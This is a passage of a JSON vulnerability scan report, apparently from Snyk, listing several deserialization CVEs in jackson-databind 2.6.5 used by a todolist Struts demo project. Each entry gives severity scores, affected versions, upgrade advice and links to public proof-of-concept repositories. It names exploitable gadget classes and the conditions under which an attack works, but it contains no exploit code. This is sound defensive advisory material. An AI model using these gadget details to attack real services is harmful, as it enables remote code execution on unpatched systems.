"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 